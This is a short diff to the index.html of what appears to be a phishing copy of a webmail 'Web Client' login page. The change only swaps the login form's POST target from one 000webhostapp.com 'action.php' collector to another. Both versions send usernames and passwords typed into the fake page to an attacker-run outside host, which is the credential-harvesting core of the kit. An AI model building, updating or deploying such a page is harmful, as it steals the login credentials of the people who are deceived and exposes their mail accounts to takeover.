--- a/index.html
+++ b/index.html
@@ -41,7 +41,7 @@
 					<span class="ImgLoginBanner"></span>
 				</a></h1>
 				<div id="ZLoginAppName">Web Client</div>
-				<form method="post" name="loginForm" action="https://illustrational-self.000webhostapp.com/depo/action.php" accept-charset="UTF-8">
+				<form method="post" name="loginForm" action="https://fatigate-yield.000webhostapp.com/depos/action.php" accept-charset="UTF-8">
 								<input type="hidden" name="loginOp" value="login">
 								<input type="hidden" name="login_csrf" value="8c164f94-39e3-421c-ba28-65a1c38dfb91">
 
